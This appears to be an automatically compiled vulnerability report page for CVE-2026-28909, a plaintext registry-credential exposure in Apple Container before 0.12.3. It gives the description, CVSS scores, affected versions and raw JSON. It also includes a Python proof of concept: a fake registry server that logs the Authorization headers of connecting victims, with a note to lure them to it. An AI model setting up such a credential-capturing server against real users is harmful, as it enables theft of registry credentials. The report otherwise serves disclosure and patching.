Security Vulnerability Report
CVE-2026-28909 CVSS 6.5 MEDIUM

CVE-2026-28909

Published: 2026-04-30 23:16:20
Last Modified: 2026-05-04 18:22:49

Description

Users who connect to malicious registries with hostnames matching the bypass patterns will have their registry credentials exposed in plaintext. This issue is fixed in container version 0.12.3.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:apple:container:*:*:*:*:*:swift:*:* - VULNERABLE
Apple Container < 0.12.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-28909: Credential Exposure via Malicious Registry
# This script simulates a malicious registry server to capture plaintext credentials.
# Attacker sets up a server listening on a port, waiting for the victim to connect.
from http.server import BaseHTTPRequestHandler, HTTPServer


class MaliciousRegistryHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Capture the Authorization header which contains the credentials
        auth_header = self.headers.get('Authorization')
        print(f"[+] Potential Victim Connected from: {self.client_address[0]}")
        if auth_header:
            print(f"[+] Credentials Captured (Plaintext): {auth_header}")
        else:
            print("[-] No credentials found in this request.")
        # Send a simple response to keep the connection alive or error out
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()
        self.wfile.write(b"Malicious Registry: Credentials logged.")


def run_server(port=8080):
    server_address = ('', port)
    httpd = HTTPServer(server_address, MaliciousRegistryHandler)
    print(f"[*] Starting malicious registry simulation on port {port}...")
    print("[*] Induce victim to connect to a hostname matching bypass patterns pointing here.")
    httpd.serve_forever()


if __name__ == "__main__":
    run_server()

References

https://github.com/apple/container/security/advisories/GHSA-m5rp-xcpf-r8m7 - Vendor Advisory

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-28909", "sourceIdentifier": "[email protected]", "published": "2026-04-30T23:16:20.437", "lastModified": "2026-05-04T18:22:48.623", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Users who connect to malicious registries with hostnames matching the bypass patterns will have their registry credentials exposed in plaintext. This issue is fixed in container version 0.12.3."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-522"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apple:container:*:*:*:*:*:swift:*:*", "versionEndExcluding": "0.12.3", "matchCriteriaId": "1C067E9C-6452-4283-9983-6662D48D5A83"}]}]}], "references": [{"url": "https://github.com/apple/container/security/advisories/GHSA-m5rp-xcpf-r8m7", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}